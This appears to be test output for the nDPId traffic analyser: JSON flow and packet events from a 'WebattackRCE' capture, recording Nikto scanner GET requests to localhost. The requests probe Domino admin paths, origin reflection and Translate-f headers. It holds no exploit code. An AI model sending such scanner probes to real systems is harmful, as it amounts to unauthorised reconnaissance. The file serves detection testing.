+00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1576420276744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276744,"pkt":"AAAAAAAAAAAAAAAACABFAADJ7atAAEAGToF\/AAABfwAAAcH2H5DjmNWMPF0CB4AYAED+vQAAAQEICp1m+zCdZvswR0VUIC9hZG1pbjQubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KDQo="} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin4.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1576420276745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276745,"pkt":"AAAAAAAAAAAAAAAACABFAADJnTFAAEAGnvt\/AAABfwAAAcH4H5DLFKUODsXYX4AYAED+vQAAAQEICp1m+zGdZvsxR0VUIC9hZG1pbjUubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin5.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1576420276747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420276747,"pkt":"AAAAAAAAAAAAAAAACABFAADL46dAAEAGWIN\/AAABfwAAAcH6H5C6Q9uIEYxnOoAYAED+vwAAAQEICp1m+zOdZvsyR0VUIC93ZWJhZG1pbi5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webadmin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1576420276749,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276749,"pkt":"AAAAAAAAAAAAAAAACABFAADONl9AAEAGBcl\/AAABfwAAAcH8H5Dz0w5\/kxB3k4AYAED+wgAAAQEICp1m+zWdZvs1R0VUIC9ub25leGlzdGVudC5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nonexistent.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1576420276751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276751,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ubFAAEAGgoV\/AAABfwAAAcH+H5C5FIGNENlwioAYAED+swAAAQEICp1m+zedZvs2R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpwYXJrZWQgZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:parked detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1576420276754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420276754,"pkt":"AAAAAAAAAAAAAAAACABFAADbnMVAAEAGn1V\/AAABfwAAAcIAH5C\/caTogsAMB4AYAED+zwAAAQEICp1m+zqdZvs5R0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCk9yaWdpbjogbmlrdG8uZXhhbXBsZS5jb20NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1576420276756,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420276756,"pkt":"AAAAAAAAAAAAAAAACABFAADW2EVAAEAGY9p\/AAABfwAAAcICH5Ck9+BnopzEpIAYAED+ygAAAQEICp1m+zydZvs8R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KT3JpZ2luOiAuZXhhbXBsZS5jb20NCg0K"} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1576420276758,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276758,"pkt":"AAAAAAAAAAAAAAAACABFAADPoehAAEAGmj5\/AAABfwAAAcIEH5AAZJnEB3vRtYAYAED+wwAAAQEICp1m+z6dZvs+R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1576420276760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276760,"pkt":"AAAAAAAAAAAAAAAACABFAADRGS1AAEAGIvh\/AAABfwAAAcIGH5CUqCEOlTzFf4AYAED+xQAAAQEICp1m+0CdZvtAR0VUIC9qdW5rOTk5LmFzcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk999.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1576420276761,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276761,"pkt":"AAAAAAAAAAAAAAAACABFAADQx0dAAEAGdN5\/AAABfwAAAcIIH5Btvf9kj27E6oAYAED+xAAAAQEICp1m+0GdZvtBR0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1576420276763,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420276763,"pkt":"AAAAAAAAAAAAAAAACABFAADSXUtAAEAG3th\/AAABfwAAAcIKH5BTRGVwA03HQYAYAED+xgAAAQEICp1m+0OdZvtCR0VUIC9qdW5rOTg4LmFzcHggSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk988.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 